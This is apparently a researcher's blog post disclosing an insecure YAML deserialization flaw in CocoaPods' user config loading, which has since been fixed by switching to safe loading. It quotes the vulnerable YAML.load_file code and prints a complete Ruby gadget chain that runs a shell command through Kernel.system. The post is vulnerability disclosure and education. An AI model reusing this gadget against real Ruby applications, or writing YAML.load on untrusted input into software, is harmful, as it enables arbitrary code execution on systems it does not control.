Home Cocoapods Yaml Insecure Deserialization Security Disclosure
Post
Cancel

Cocoapods Yaml Insecure Deserialization Security Disclosure

Posted Jul 5, 2023
By
1 min read

YAML (YAML Ain’t Markup Language) is a popular data serialization format used in many programming languages, including Ruby. Insecure deserialization is a security vulnerability that occurs when an application deserializes data from an untrusted source and allows an attacker to execute arbitrary code or perform unauthorized actions.

In Ruby, YAML deserialization can be exploited if the application blindly loads and processes YAML data without proper validation and sanitization. This can lead to various security risks, including remote code execution (RCE), denial of service (DoS), or data manipulation.

I found that the Cocoapods package is vulnerable to yaml deserialization.

Within the lib folder(https://github.com/CocoaPods/CocoaPods/blob/master/lib/cocoapods/config.rb#L114), for processing a user config file, using yaml.load which is unsafe, this is vulnerable to insecure deserialisation.

1
2
3
4
5
6

          if use_user_settings && user_settings_file.exist?
        require 'yaml'
        user_settings = YAML.load_file(user_settings_file)
        configure_with(user_settings)
      end

It is possible to abuse this flaw locally if a user has arbitrary file write, or is looking to privilege escalate via a local user

If I can overwrite ~/.cocoapods/config.yaml with the below deserialization gadget, which executes the id command, i can leverage cocoapods for code execution

Example gadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

This will execute the id command successfully.

So one can modify the cache file with a gadget and run any pod command pod list and it will execute malicious code.

With ruby yaml itself, YAML.load, YAML.load_documents, YAML.load_file and YAML.load_stream all do insecure deserialisation and the safe APIs dont. You need to use yaml.safe_load instead.

Disclosure:

Fixed with PR - https://github.com/CocoaPods/CocoaPods/pull/11974 but maintainers didn’t assign any CVE. I didn’t bother chasing it up either.

software security
yaml
This post is licensed under CC BY 4.0 by the author.
Recently Updated